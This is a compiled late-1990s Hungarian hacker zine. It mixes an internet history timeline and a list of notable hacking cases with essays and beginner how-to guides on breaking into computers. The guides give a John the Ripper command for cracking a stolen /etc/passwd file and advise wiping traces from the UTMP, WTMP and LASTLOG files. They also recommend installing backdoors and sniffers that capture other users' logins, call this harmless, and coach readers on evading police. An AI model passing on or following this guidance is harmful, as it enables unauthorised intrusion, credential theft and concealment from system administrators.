(Számítástechnikai Kutatóintézet) és a linzi (Ausztria) egyetem között.<br />

1992<br />

A CERN-ben hivatalosan bemutatják a world wide webet.<br />

1993<br />

Megalakul az InterNIC szervezet, amely szabályozza a hálózati nevek kiosztását.<br />

Marc Andereesen megírja az elsô grafikus webböngészô programot a Mosaicot. A<br />

www ezután szédületes tempóban kezd fejlôdni. Magyarországon is üzembe állítják<br />

az elsô webszervert a Budapesti Műszaki Egyetem folyamatszabályozási tanszékén.<br />

1994<br />

Az üzlet is egyre markánsabban jelen van a hálón: megalakul az elsô internetes<br />

pénzintézet, a First Virtual. A Mosaicot kifejlesztô Andereesen és a Silicon Graphics<br />

alapítója, Jim Clark létrehozza a Netscape vállalatot, amely Navigator nevű<br />

webböngészôjével rövidesen az Internet legfontosabb szoftvercégévé válik.<br />

1995<br />

A csomópontok száma 6 642 000!! A PC-világban szinte monopolhelyzetben lévô<br />

Microsoft megjelenik új operációs rendszerével, a Windows 95-tel (bár csak ne tette<br />

volna -Szilos ). Az operációs rendszerhez külön kapható kiegészítô csomag, a Plus<br />

tartalmazza a Microsoft saját webböngészôjét, a Mosaicból kifejlesztett Explorert.<br />

Megkezdôdik a böngészôháború a Netscape és a Microsoft között.<br />

1996<br />

Piackutató cégek adatai szerint csak ebben az évben 1,1 millió munkahelyet teremt a<br />

net. A végfelhasználók körülbelül 19 milliárd dollárt költenek internetes<br />

szoftvertermékekre.<br />

1997<br />

Becsült adat: idén 2,7 billió e-mail fordul meg a hálón. 2000-re ez a szám 6,9 billióra<br />

nôhet.<br />

35


Hackers’ Guide<br />

(A Népszabadság Világháló című melléklete alapján)<br />

- Szilos -<br />

************************************************************************************************<br />

A Byte magazin 98/4 -es számában megjelent cikke.<br />

A kalozkodas nem uj, az esetek gyakorisaga azonban ijeszto utemben novekszik.<br />

Minel kifinomultabb rendszerek jelennek meg, a kalozok annal elszantabban<br />

probalnak betorni.<br />

Ime nehany a kozismertebb esetek kozul:<br />

1977 John Draper egy gabonapelyhes dobozbol szarmazo jatek sippal utanozta az<br />

ingyenes telefonvonalat kero jelet.<br />

1978 Steve Jobs es Steve Wozniak, ket hobbi szamitogepes elkeszitett egy<br />

ugynevezett kek dobozt telekommunikacios szamitogepekre valo betoreshez.<br />

1979 A 17 eves Kevin Mitnicket harom honapra orizetbe vettek, es egy ev probaidore<br />

iteltek, amiert betört a Pacific Bell COSMOS telefonkozpontjaba.<br />

1983 Mitnicket hat honapra afiatalkoruak bortonebe csuktak, miutan betort a<br />

Pentagon szamitogepere.<br />

1984 Megalakult a 2600 Magazine: The Hacker Quarterly<br />

1987 Mitnicket 36 honap felfuggesztettre iteltek, amiert egy kaliforniai cegtol<br />

software-t lopott.<br />

1988 Robert Morris egy virus segitsegevel 6000 szamitogepet tett tonkre az<br />

Interneten. Megalakult a Computer Emergency Response Team.<br />

1989 Mitnick bunosnek vallotta magat szamitogepes csalas, es illegalis, tavolsagi<br />

hivashoz szukseges eleresi kodok birtoklasanak (ez utobbi kapcsolodik az 1988-ban<br />

a Digital Equipment Corp. szamitogepei elleni kalozakciohoz) buntetteben. Egy ev<br />

bortonre es hat honap felfuggesztettre iteltek.<br />

1990 Morrist harom honap felfuggesztettre, 400 ora kozmunkara es 10 000 dollar<br />

birsagra iteltek 1988-ban elkovetett buneert.<br />

1992 A Masters of Deception bandat bunosnek talaltak szamitogepes<br />

buncselekmenyek es osszeeskuves vadjaban. A tagok hat honap es egy ev kozotti<br />

szabadsagvesztest kaptak. Mitnick betort a Packard Bell szamitogepeire, amiert<br />

szabadulasa utani harom ev rendori felugyeletre iteltek. Megszokott, mielott az FBI<br />

elkapta volna.<br />

36


Hackers’ Guide<br />

1993 Justin Tunner Petersent tobb rendbeli szamitogepes csalasert, koztuk egy 150<br />

000 dollaros atutalasert letartoztattak. Iteletet csokkentettek, miutan feladott mas<br />

kalozokat, koztuk Mitnicket. Kesobb csatlakozott az FBI-hoz.<br />

1994 A kaliforniai DMV 1 millio dollaros dijat tuzott ki Mitnick letartoztatasaert, amiert<br />

az csalard modon probalt jogositvanyt szerezni maganak.<br />

1995 Haromevi menekules utan Mitnicket Petersen segitsegevel letartoztattak, es 23<br />

rendbeli szamitogepes csalassal vadoltak. Vlagyimir Levint a Citibankbol 10 millio<br />

dollart ellopo orosz kalozbanda vezetesevel vadoltak, es Londonban letartoztattak.<br />

1996<br />

aprilis A 19 eves Christopher Schanotot kiengedtek a bortonbol, es hazi orizetben<br />

tartottak, miutan eliteltek a Southwestern Bell Telephone, a Bell Communications<br />

Research, a Spring es az SRI International szamitogepeire valo betoresert. Mitnick<br />

20 000 ervenyes hitelkartyaszamot lopott. Emellett bunosnek vallotta magat lopott<br />

mobiltelefon szamok hasznalataban es a probaido megserteseben ( a DEC gepeire<br />

valo betoresben). A varhato itelet 20 ev borton, plusz 2-3 ev a probaido<br />

megszegeseert.<br />

junius Amerikai es angol bankok, brokerhazak es befekteto cegek hajlandoak voltak<br />

olyan bunozoknek fizetni, akik szamitogepes rendszereik feltoresevel fenyegettek<br />

meg a cegeket.<br />

augusztus Kalozok bejutottak az Igazsagugyi Miniszterium honlapjara, es annak<br />

tartalmat uszito szovegekre es kepekre, peldaul Adolf Hitler fotojara csereltek. A<br />

helyet az Igazsagtalansag Miniszteriumava kereszteltek at.<br />

szeptember Mitnick es allitolagos tettestarsa, Lewis DePayne artatlannak vallotta<br />

magat a 2 es fel eves bunugyi kalozkodasaval kapcsolatban felhozott szovetsegi<br />

vadakkal szemben. A Mitnick elleni vadak 25, 1992 juniusa 1995 februarja kozott<br />

elkovetett szamitogepes betorest es ellenszegulest tartalmaztak. Ha Mitnicket<br />

bunosnek talaljak, akar 100 ev bortonre is itelhetik.<br />

november Kalozok tortek be az America Online Court TV oldalaira, amely O. J.<br />

Simpson perevel kapcsolatos hireket tartalmazott.<br />

december Egy kaloz a denial of service tamadassal leallitotta a Web<br />

Communicationst, 3000 kereskedelmi web-hely tarolojat. Egy azonositatlan csoport<br />

betort az Egyesult Allamok legierejenek web oldalaira, megtoltve azt szines<br />

szlogenekkel, es remes animaciokkal.<br />

1997<br />

januar Egy magat D.A.M.M. -nek nevezo csoport betort a UNICEF web oldalaira. A<br />

lapokon szupermodellek kepeit es Mitnickre utalo feliratokat helyeztek el.<br />

A huszeves Yale diak, Nicholas Ryan bevallotta, hogy olyan programot keszitett,<br />

amely ingyenes elerest biztositott az AOL-hez. A vad kepviseloje 250 000 dollarig<br />

terjedo birsagot es ot ev bortont kert.<br />

februar A Chaos Computer Club kalozai megjelentek a nemet televizioban, es<br />

bemutattak egy ActiveX vezerlot, amely penzt von le bankszamlakrol es masikra<br />

helyezi at anelkul, hogy a PIN kodra szukseg volna.<br />

37


Hackers’ Guide<br />

marcius Kalozok tortek be a NASA web oldalaira es politikai kialtvanyt helyeztek el<br />

azon. A rendszergazda letiltotta az oldalak elereset. Egy massachussetsi fiatal - aki<br />

letiltotta a Worcesteri repuloter legi iranyitotornya fele meno kommunikaciot - lett az<br />

elso fiatalkoru, akit a szovetsegi birosag elott szamitogepes kalozkodas miatt<br />

eliteltek. A fiu elismerte bunet, cserebe ket ev felfuggesztettet, birsagot es<br />

kozszolgalati munkat kapott. Kaloz tort be a Well-hez, jelszavakat lopott el,<br />

felhasznaloi adatokat es mas allomanyokat torolt, majd trojai programokat helyezett<br />

el a halozaton.<br />

aprilis Egy, a merevlemez osszes allomanyat torlo AOL4FREE.COM nevu trojai<br />

program terjedt az Interneten. Portugal kalozok tortek be az Indonez Hadsereg<br />

halozatara, amelynek modositasaval tiltakoztak a kormany kelet-timori politikaja<br />

ellen.<br />

Kalozok hatoltak be az Amnesty Internationalhoz, s a weben egy cigarettazo baba<br />

fenykepet helyeztek el.<br />

Május Carlos Felipe Salgado beismerte, hogy 100 000 hitelkartyaszamot lopott el<br />

egy San Diego-i gépről, valamint olyan programot telepitett, amely felismeri es rogziti<br />

az elofizetok jelszavait.<br />

Junius A Mezogazdasagi Miniszterium kulugyi szolgalata leallitotta honlapjat, miutan<br />

biztosagi problemakat fedezett fel.<br />

Mitnicket 22 honap, szovetsegi bortonben letoltendo szabadsagvesztesre iteltek,<br />

amiert illegalis mobiltelefon-kodokat birtokolt, es az 1989-es csalasat koveto<br />

megfigyelesi idoszakban megszegte a torvenyt.<br />

Oktober A ValuJet web oldalai lealltak, miutan kalozok lezuhano repulogepek kepeit,<br />

es kozvetlenul a ceg vezetoinek szolo kepeket helyeztek el rajta.<br />

1998<br />

Februar A SUid csoport egyik tagja behatolt az USA Kereskedelmi Miniszteriumanak<br />

oldalaira, es hamis informaciokkal toltotte meg azt. A Pentagon es az FBI kivizsgalta<br />

a kalozok azon sikeres kiserleteit, amelyekben nem rendszerezett informaciokat<br />

szereztek meg az orszag vedelmi szamitogepeirol. E betoresek soran a fegyveres<br />

erok minden agat tamadas erte, a megszerzett allomanyok kozott fizetesi es<br />

szemelyes adatok is talalhatok.<br />

Marcius A magat The Analyzernek nevezo kaloz betort a NetDex nevu kaliforniai<br />

Internet-szolgaltatohoz, otthagyott uzeneteben kaloztarsa letartoztatasa ellen<br />

tiltakozva. Az uzenet szerint az eredeti betoresert is o volt a felelos. A NASA,a<br />

haditengereszet es az egyetemek W95-ot es NT-t futtato gepei mind a denial of<br />

service tamadas celpontjaiva valtak. Az igy megtamadott szamitogep kek halalt hal.<br />

Az izraeli rendorseg letartoztatta a 18 eves Ehud Tenebaumot, alias The Analyzert, a<br />

Pentagon szamitogepeire valo betoresben jatszott szerepeert. Allitolag tobb tucat<br />

amerikai es izraeli allami, kereskedelmi es oktatasi rendszerbe hatolt be. Az izraeli<br />

hatosagok Tenebaum ket tizeneves vedencet is letartoztattak.<br />

Majus A L0pht csoport tagjai vallomast tettek a szenatus elott, amelyben azt<br />

allitottak, hogy fel oran belul kepesek az egesz Internetet leallitani.<br />

Szeptember Egy nappal azutan, hogy a Microsoft elkeszitette a Hotmail biztonsagi<br />

resenek javitasat, a kalozok megjelentek egy ezt semmise tevo JavaScript kóddal.<br />

38


Hackers’ Guide<br />

Kalozok hatoltak be a The New York Times web oldalaira, es 150 000 vasarnapi<br />

latogatot inzultaltak ellenseges kepekkel.<br />

Miutan az oldalakat helyreallitottak, a kalozok ismet visszaallitottak a modositott<br />

kezdooldalt.<br />

Az egyiptomi rendorseg letartoztatott két kalozt, akik lopott hitelkartya szamokkal 147<br />

000 dollar erteku pornograf kepet, illetve filmet toltottek le.<br />

A kinai rendorseg elfogta Yang Wei programozot, aki betort egy orszagos<br />

szamitogep halozatba, es visszafejtett tobb, mint 500 azonositot es jelszot.<br />

A 28 eves Aaron Blossert azzal vadoltak, hogy behatolt az U.S. West szamitogepes<br />

rendszerebe, es tobb, mint 2500 szamitogepet egy 350 eves matematikai problema<br />

megoldasara hasznalt fel. Ekozben megszerezte a U.S. West 15 000<br />

munkaallomasanak jelszavat, es a kodolt anyag nagy reszet tovabbitotta az<br />

internetre.<br />

Eredeti: frater frater2@egon.gyaloglo.hu<br />

- H3XR00T -<br />

http://hexnet.hpage.<br />

net/<br />

************************************************************************************************<br />

A Hacker és társai<br />

Kezdés<br />

Én most szives engedelmetekkel az IGAZI hackerről es hackelésről beszelnék,<br />

egész cikkemben.<br />

A hekker, vagyis hacker nem egy internetes kalózt jelentett régen, hanem egy<br />

programozó Gurut, aki arra törekedett, hogy egy programot írva azt minél kisebbre<br />

irja meg, de persze ugyanazokkal a képességekkel. Szóval a hacker mára sem<br />

hagyta el igazi mivoltát, csak most nem offline, hanem online dolgozik. A hacker<br />

security hole-okat használ ki, amelyek vagy rootot adnak, vagy SuperUseri<br />

privilégiumokat. Igazából így születtek meg az exploitok, amelyek általában "C"<br />

programok. Az exploit egyszerre általában egy bugot használ ki, amely segít elérni a<br />

célját. Ennyit a hackerről.<br />

Most következzen, mit is csinál egy hacker... Egy hacker ha már elérte célját<br />

általában BackDoor-okat rak fel az áldozati gépre, amelyek abban segítenek, ha az<br />

eredeti rendszergazda jelszót vált. Ezen kivul nagy forgalmú gépre érdemes<br />

Sniffereket tenni. A sniffer csak root joggal működik, de megéri, mivel azt figyeli,<br />

amikor egy ártatlan user ftp-zik illetve telnetezik a gépről loggolja az account<br />

usernevét és jelszavát. FIGYELEM! A HACKER SOHA(!) SEM RONGÁL!!!<br />

Az ilyen emberek, akik hackereknek hiszik magukat, általában más programjaival<br />

39


Hackers’ Guide<br />

hatolnak be és azokkal ,,megsebzik'' a gépet. Ilyet soha ne tégy! Ne felejtsd el, hogy<br />

az értelmes hacker általában text filet hagy maga után, amelybe leírja mit kell<br />

kijavítani, vagy milyen módon jutott be (lehet az /etc/motd fájlba is). A snifferek és a<br />

backdoorok nem rongálnak és általában nem okoznak bajt.<br />

Továbbá léteznek olyan hackerek, akik néha ártalmatlan, néha ártalmas vírusokat<br />

írnak és ezeket terjesztik. Nemrég volt rá példa a "Melissa" nevezetű vírus készítője,<br />

akit vagy 20 év börtönbüntetésre ítélhetnek, ha minden vádpontban bűnösnek<br />

találják. Az ilyenek sem igazi hackerek, bár annak néznek ki, végülis profi<br />

programozók.<br />

Ezek után említenék pár dolgot a Crackerről (nem HACKER, CRACKER!). A cracker<br />

általában egy elbúsult ember, aki nem találta meg a Neten a helyét. Soha ne<br />

keverjük össze a hackerrel! A cracker maximum amatőr programozó, de még talán<br />

az sem. Szóval a cracker mások által írt programokat használ, amelyeket nem ért,<br />

csak csupán használ. Hozzáteszem nem exploitokat! Ezeket kitanulja használni és<br />

ezzel elindul tesztelni, ha egyik nem megy az emberen neki, kipróbálja a másik<br />

progit. Az ilyen emberek azok, akik NetBust, BO-t, vagy ilyeneket használnak. A<br />

cracker sohasem tapasztalatból csinálja, amit csinál, hanem ösztönből. Én az<br />

ilyeneket semmibe veszem. Ők azért lettek ilyenek, mert nem sikerült befutni<br />

hackerként, ezért választották ezt a "munkát". Én elítélem őket. Ha be is jutnak egy<br />

szerverre, csak véletlen sikerült. Erről ennyit.<br />

Mit használ illetve nem használ egy hacker?<br />

Először is lejegyzem, nembaj, ha van olyan progid, amit nem használ, sose töröld le!<br />

Mindig hasznodra lehet.<br />

Használ/csinál/szükséges:<br />

• "C" compiler<br />

• Telnet :)<br />

• FTP :)<br />

• Notepad :)<br />

• Exploitok (akár netről is lehet leszedni, vagy írni)<br />

• Minél több oktató jellegű dokumentum --> Mint ez :)<br />

• Mindig olvasni új fejlesztéseket!<br />

• Egy anonym email<br />

• Minél több hackelt shell (Taiwan, Deutsch, stb.)<br />

• Agy ("Use your brain and u have a good day :)" /Pac)<br />

• Víruskeresők, kódoló progik<br />

Ezeket használja, csinálja, szükségesnek tartja egy hacker...<br />

Igazából nem tudom hova soroljam a John the Ripper nevezetű progit, amely az<br />

/etc/passwd filet pörgeti egy szótár segítségével, vagy önmagával (single crack<br />

mode).<br />

Az ilyen se kell, de nem baj, ha van. Ugyanis, ahogy egyszer Dudu barátom írta, ,,A<br />

passwd fájl törése nem hackelés''. Ezért nem írom még a tiltott holmikhoz :)<br />

40


Most nézzük mit nem használ, mit nem kell használnija, mit nem érdemes:<br />

• NetBus<br />

• BO, semmi trojan, semmi vírus<br />

• PortScanner (minek?)<br />

• Jack's password cracker<br />

• Nuke, DialUp killer<br />

• Spoofer, Flooder progik<br />

Hackers’ Guide<br />

Ezeket a progikat, amik ittvannak általában Crackerek használják. Semmi<br />

szükségünk rá.<br />

Amúgy van egy mondásom: ,,A Cracker hamarabb megfertőződik, mint áldozata''<br />

Erről ennyit, és itt most abbahagyom.<br />

Ki egyetért, ki nem...<br />

--> tHIS fILE iS cREATED wITH nOTEPAD


Hackers’ Guide<br />

I. Gondolatok a Hackelesrol<br />

1.0 - Bevezeto<br />

1.1 - Hackerek, Phreakerek, Crackerek<br />

1.2 - Mielott belekezdenel<br />

1.3 - Pranoia<br />

II. Operacios rendszerek<br />

2.0 - Windows 9x<br />

2.1 - UNIX/Linux<br />

III. Passwd<br />

3.0 - Szukseges programok<br />

3.1 - A jelszofile (passwd)<br />

3.2 - A jelszofile feltorese<br />

3.3 - Utolso lepesek<br />

IV. Exploitok<br />

4.0 - Mik azok az exploitok?<br />

I. Gondolatok a hackelesrol<br />

1.0 - Bevezeto<br />

Az alabbiakban szeretnem mindenkivel megosztani azt amire egy kezdo hackernek<br />

szuksege van. Attol, hogy ezt elolvasod meg nem leszel hacker. Ez csak egy kis<br />

lokes lehet az utadon, ha a hackeles mellett dontesz.<br />

Mostanaban egyre gyakrabban hallani arrol, hogy komputerkalozok tortek be<br />

szuperszamitogepekbe, tinedzsert csiptek nyakon etc. Manapsag egy hackernek<br />

nagyon vigyaznia kell, jobban mint regen. A fejlett technika miatt a kopok<br />

egyre hatekonyabbak, a gepek okosabbak. Gondold at mielott belefogsz!<br />

1.1 - Hackerek, Phreakerek, Crackerek<br />

Gyakori, hogy az emberek osszekeverik a hackereket, phreakereket es a<br />

crackereket. A hacker halozatokon keresztul szamitogepekbe tor be. Celja nem<br />

a rombolas, hanem az epites. Kutat a tudas utan. Minden egyes szamitogep<br />

egy kihivas, legyen az egy iskola szervere vagy egy NATO szuperszamitogep.<br />

Sokan sajnos rossz dolgokra hasznaljak a tudasukat. Szamitogeprendszereket<br />

tesznek tonkre mosolyogva egyetlen gombnyomassal, penzt, adatokat tulajdonitanak<br />

el.<br />

A phreakerek a telefonvonalak manipulalasaval foglalkoznak. Biztos sokan<br />

lattatok a Hackers cimu filmet es abban Phreak Phantom-ot az o kis magnetofonjaval<br />

:)<br />

A crackerek programokat tornek fel. Nem egyszer a program megjelenese utan par<br />

oraval<br />

(vagy epp meg a megjelenes elott) le lehet tolteni az internetrol a feltort verziot.<br />

Sokan elitelik amit csinalnak, de el kene gondolkodni mi lenne ha nem lennenek.<br />

Ki tudna megfizetni 10000 ft-ot egy jatekproggiert, vagy 300000-et komolyabb<br />

kepszerkesztoert...<br />

42


1.2 - Mielott belekezdenel<br />

Hackers’ Guide<br />

Nem art elgondolkodni arrol, miert akarunk hackelni. Ha elkapnak akkor<br />

kegyetlenul ra lehet pacsalni. Kirughatnak az iskoladbol, (ill. munkahelyedrol)<br />

megvan arra az esely, hogy SOHA nem talalsz olyan munkat ahol szamitogep<br />

kozeleben lehetsz (vagy dolgozhatsz). Legrosszabb esetben bortonbuntetes a<br />

"jutalom". Nagyon kell vigyazni mit teszel, hiszen konnyen lehetnek az elso<br />

betoreseid az utolsok...<br />

1.3 - Paranoia<br />

Elso szamu szabaly: legy paranoias! Kodold az egesz vinyodat, ne beszelj arrol<br />

masnak, hogy epp min dolgozol...egyatalan senki ne tudjon rola hogy te mivel<br />

foglalkozol. Jegyzeteidet tarts a gepeden kodolva, papiron veletlenul se,<br />

kidobni pedig vegkepp ne dobd ki! Ezek kisse furan hangzanak de vegulis a<br />

bortonbuntetes is lehet vidam nemigaz?! :)<br />

II. Operacios rendszerek<br />

1.0 - Windows 9x<br />

Az emberek legtobbje valoszinuleg windows valamely verziojat hasznalja. A<br />

kezdetekben ez eleg is azonban ha igazan komolyan akarsz foglalkozni<br />

a hackelessel valamilyen Linux/UNIX oprendszerre lesz szukseged.<br />

2.0 - UNIX/Linux<br />

Az oprenszerek fellegvara. Csak azt nem tudsz megcsinalni vele amit nem<br />

akarsz. Legtobben a Linuxot hasznaljak mivel ingyenes. Nagyon stabil es<br />

biztonsagos. Es meg windows-os kezelofelulete is van! (X Windows) :)<br />

III. Passwd<br />

3.0 - A szukseges programok<br />

A UNIX alapu rendszerekben talalhato egy passwd nevu file ami a kovetkezokepp<br />

nezhet ki: jane:GXkGUFA1NofyM:203:10:JaneBailey:/aa/widget/jane:bin/sh<br />

Felhasznaloi nev: jane<br />

Kodolt jelszo: GXkGUFA1NofyM<br />

Azonosito szam: 203<br />

Csoportazonosito: 10<br />

GCOS mezo: JaneBailey<br />

Home konyvtar: /aa/widget/jane<br />

Kezdeti shell: /bin/sh<br />

3.2 - A jelszo file feltorese<br />

A login folyaman a megadott username es password utan a beutott pass<br />

osszehasonlitasra kerul a kodoltal es ha egyezik akkor beenged a rendszer.<br />

Azonban fel is torhetjuk a jelszot. Erre a legjobb megoldas valamilyen<br />

password cracker program hasznalata. Linux alatt a Crack, DOS/Win alatt a<br />

43


Hackers’ Guide<br />

John The Ripper a legjobb. Ezekhez meg szerenznunk kell egy dictionary filet<br />

ami azokat a loginokat/passokat tartalmazza amiket a cracker hasznalni fog.<br />

Egy pelda a John The Ripper hasznalatara:<br />

john.exe -w:dictionary.txt passwd<br />

Dictionary filet a www.hackersclub.com/km cimen talalsz vagy az ftp.ox.ac.uk-n.<br />

3.3 - Utolso lepesek<br />

Ha sikerult megszereznunk a root jelszot es beleptunk a rendszerbe akkor<br />

kilepes elott el kell tuntetni magunk utan a nyomokat. Ezt a logfileok<br />

modositasaval tehetjuk meg. 3 filet kell modositani: UTMP, WTMP, LASTLOG<br />

Ezt vagy manualisan tesszuk meg vagy vmi program segitsegevel (pl zap2).<br />

Azonban ne toroljuk le oket, mivel igy a rendszergazda konnyen eszreveheti<br />

hogy bent jartunk a rendszerben.<br />

El kell gondolkodnunk mekkora az esely a lebukasra. Ha egy oktatasi intezmeny<br />

szerverebe tortunk be valoszinuleg nem kell aggodnunk hiszen nem valoszinu, hogy<br />

hogy a rendszergazda azzal fogja tolteni az idejet, hogy kinyomoztasson minket<br />

es az iskolak tobbsege nem igazan all ugy anyagilag, hogy kideritsek ki jart a<br />

rendszerben. Ilyen esetekben ildomos kuldeni egy levelet, hogy mikent jutottal<br />

be, hogy fixaljak ki a bugot stb. Biztos ami biztos en az anonymous level mellett<br />

voksolok.<br />

IV. Exploitok<br />

4.0 - Mik azok az exploitok?<br />

Az exploitok olyan programok amelyek kihasznaljak egy rendszer hibajat, hogy<br />

azaltal root jogokat kaphass. Minden exploit mas, mindegyik mas resen keresztul<br />

aknazza ki a bugot.<br />

Nos ennyi lenne. Remelem mindent erhetoen fejtettem ki, laikusok szamara is<br />

erthetoen. Azt ajanlom ha igazi hacker akarsz lenni, olvass sokat aztan<br />

olvass meg tobbet es utana megtobbet es tobbet...<br />

Nehany hasznos link:<br />

News - www.rootshell.com<br />

Hackerz Hideout - www.hackersclub.com/km<br />

Thought on hack - www.extra.hu/hackerz<br />

Codemon hp-ja - www.extra.hu/CoDemon<br />

Hack adatbazis - www.neworder.box.sk<br />

CABLE BREAKERS - emperor.bdtf.hu/cb<br />

=====Cable<br />

Breakers=====================1999=========KerNel^Panic=============<br />

************************************************************************************************<br />

44


Ismertetô a hackelésrôl laikusoknak<br />

Hackers’ Guide<br />

Az itt leírtakat többnyire angol dokumentumok lefordítása után, a hasznos<br />

elemeket kiszûrve készítettem. Ez itt kizárólag ismertetô jellegû információ, a<br />

felhasználásáért semmilyen felelôséget nem vállalok, sôt az informatikai<br />

rombolást magam is elítélem!<br />

Ezek a tanácsok nem isteni sugallatok, ajánlom azonban mindazoknak, akik<br />

szeretnék kipróbálni magukat, de nem tudják hogyan kezdjenek hozzá. Hasznos<br />

lehet azonban az óvatos, és tanulni vágyó kezdô rendszergazdáknak is.<br />

Megpróbálok mindent magyarázni, akinek esetleg ezek a dolgok a könyökén jönnek<br />

már ki attól elnézést kell hogy kérjek.<br />

Amikor én eldöntöttem, hogy komolyabban szeretnék foglalkozni az imformatikával,<br />

egy idô múlva felmerült a hackerség kérdése. Elôször nem tudtam mit kezdeni az<br />

egész dologgal, hiszen nem tudtam hogy ez az egész hogyan is mûködik. Ebben<br />

szeretnek egy kis segítséget nyújtani, és segíteni eldönteni, hogy megéri-e nekik sok<br />

100 vagy 1000 órát rászánni erre a kicsit különös, és nem is éppen veszélytelen<br />

idôtöltésre.<br />

Tudnunk kell mindenek elôtt, hogy /a köznyelvben használt, általános/ hackerség<br />

ILLEGÁLIS, és ezt nem csak az USAban veszik igen komolyan! Ugyanakkor az<br />

eredeti hackerség fogalma teljesen legális! /hacker jargont ajánlom mindenki<br />

figyelmébe, ahol többek között a pontos meghatározást is megtalálhatja/<br />

3 informatikai törvenysértô alapeset létezik /nagyvonalakban/: a hacker (=><br />

halózatokon keresztül hatol be más rendszerekbe; az igazi hacker azonban nem tesz<br />

kárt bennük; fô célja az információ szerzés; nem feltétlenül jó programozó, jobban ért<br />

a hálózatok mélyének mûködéséhez), phreaker (=> egy különleges törvényen kívüli<br />

aki telefonhálózatok buherálására specializálódott), cracker (=> ô inkább programok<br />

feltörésével foglalkozik; jó programozó). A hármat rendszeresen keveri a köznyelv<br />

/fôleg a hackert és crackert/, sôtt, még néha saját maguk is rossszul tudják, hogy<br />

kicsodák. Visszatérve a lényegre természetesen akadnak mások is akik ebbe a<br />

kategóriába sorolhatóak, de most velük nem foglalkozok részletesen. Ha komolyan<br />

érdekel valakit a dolog, akkor sok olvasás után úgyis találkozni fog a többivel is. /itt<br />

újra felhívnám a figyelmet a hacker jargonra/<br />

Aki azt várja, hogy most majd megtanul hackelni 15 perc alatt, az jobb, ha itt most<br />

abba is hagyja az olvasást. Ugyanis nemhogy 15 hónap alatt, de még 15 év alatt<br />

sem lehet megtanulni mindent, arról nem is beszélve, hogy ez csak egy rövid<br />

áttekintés, azoknak akik semmit még semmit sem tudnak ezekrôl a dolgokról. Amit<br />

én itt összeírtam ebben az egész dokumentumban, az körülbelül annyi amennyit<br />

45


Hackers’ Guide<br />

Amstrong láthatott a Földbôl, amikor Holdra lépett... lényegében csak egy<br />

benyomás...<br />

A hackerségrôl általában:<br />

Fontosnak tartom, hogy úgy általában is írjak a hackerségrôl, ne csak hogy hogyan is<br />

kell, meg legális-e vagy nem. A hackerség egy "életforma" vagy inkább "életérzés",<br />

nem is sejti az átlag, vagy akár egy informatikához értô ember, hogy valójában<br />

milyen komoly dolog is ez az egész, ennek saját kúltúrája és társadalma van. A<br />

nyelve eredetileg angol, de ami a hackereknek köznyelv, az egy átlag embernek<br />

érthetetlen szakzsargon /nálam is letölthetôek hackerek által használt szlengek és<br />

szakszavak szótárai/. Lehet kettôs életet élni, de nem igazán lehet kicsit hackernek<br />

lenni. Ha valaki ért hozzá akkor már hacker, mégha gyakorlatlan és amatôr is. Egy<br />

hacker óvatos, nem beszél nyíltan semmirôl, még a legközelebbi rokonainak sem;<br />

nem mondja el, hogy éppen min dolgozik, és mit ért el.<br />

A hackerek az interneten valójában semmilyen hétköznapi embertípushoz nem<br />

hasonlíthatóak. Közel állnak egy csapat szemüveges professzornak és egy<br />

összetartó vad utcai bandának az ötvözetéhez, akiknek fegyvere a mérhetetlen<br />

szaktudás.<br />

Elöször lássuk, mire is lesz szükségünk a kezdetekhez!<br />

Fizikailag:<br />

• Computer. Tulajdonképpen a fajtája mindegy, mert minden platformra<br />

(=géptípus, mint: PC vagy Macintosh) megtalálhatóak a megfelelô programok.<br />

Az operációs rendszerrel (=a computert kezelô alap program, mint:<br />

Windows98, Windows95, MacOS, Unix, Linux) már komolyabban kell<br />

foglalkoznunk. Feltehetôleg a kezdôknek Windowsa van, esetleg MacOSe,<br />

ezzel sajnos nem fogunk tudni elérni sokmindent, de egyenlôre megfelel.<br />

Hozzáfûzöm, hogy nem kell elkeserednie annak, akinek nincs egy<br />

tizenszázezer megahertzes processzora, meg 3Dfx kártyája, meg 124Mega<br />

memoriája, ezek itt nem fognak hiányozni.(kivéve Brute Force feltöréseknel,<br />

ahol a gépünk "nyers erejét" fogjuk kihasznalni, hogy dekodoljunk egy jelszot<br />

peldául)<br />

46<br />

• Modem.<br />

• Internet elérés. Sajnos saját, otthoni internet elérés nélkül nagyon nehéz<br />

dolgunk lesz, mert szinte minden információt innen fogunk begyûjteni.<br />

• IRC vagy egy segítôkész computeres haver. /ajánlott/ Az IRC egy valós idejû<br />

beszélgeôs rendszert jelent, amelyre rakapcsolódva mindig fogunk olyanokat<br />

találni akik tudnak nekünk segíteni. Valamint filekat is küldhetünk vele, ez<br />

néha jól is jön, ha a file fogadója történetesen egy fileok fogadására<br />

konfigurált, valamilyen szerveren tanyázó robot program. Ez a rendszer már<br />

önmagaban is megér egy hatalmas dokumentációt, a linkgyûjteményemben<br />

fogtok találni ezzel kapcsolatban egészen sok segítséget. Elôször is ajánlatos<br />

letölteni egy IRC kliens programot, mellyel hozzákapcsolódhatunk a


hálózathoz. /Windowson mIRC, Macintoshon IRCle, Unix/Linux bitchX<br />

amennyire én tudom/<br />

Hackers’ Guide<br />

• Hálózati, illetve különbözô programozási nyelvekkel foglalkozó programok<br />

tömkelege, nyom-eltüntetôk, feltörô- és kódolóprogramok stb. No Comment...<br />

ezeket majd szép lassan be le7 gyûjteni, többnyire ingyenesek, és az<br />

internetrôll letölthetôek. /nálam a letölthetô szövegfilekba van sok ilyen<br />

beleírva, amelyet egy C fordítóval majd le lehet fordítani/<br />

Szellemileg:<br />

• Sok-sok türelem. /ismétlem: SOK/<br />

• Unix/Linux operációs rendszer ismerete. Hackereknek elengedhetetlen,<br />

egyébként igen erôsen ajánlott. Más, komolyabb hálózati OPrendszerek<br />

ismeretére is szükségünk lesz, legalább felületesen. /pl.: WindowsNT/<br />

Gondolom ez az elsô pont, ahol a legtöbb laikus lelkesedése kicsit alábbhagy.<br />

Erre azonban késôbb mindenképpen szükség lesz, elsajátítása magában is<br />

legalább egy fél év.<br />

• Programozási ismeretek. Crackereknek elengedhetetlen, de másoknak is<br />

szintén szüksége lesz rá, nehezen tudjuk kikerülni, legalább egy nyelvet kell<br />

ismernünk, hogy valamelyest megértsük az egész computeres világ<br />

mûködését. Legjobb ha a C nyelvet ismerjük, mert minden komolyabb<br />

helyzetben ezt használja mindenki, de kezdôknek ez irtó bonyolult lesz, ezért<br />

ezzel kezdeni nem ajánlatos.<br />

• Hálózatok mûködésének ismerete. Hackereknek elengedhetetlen.<br />

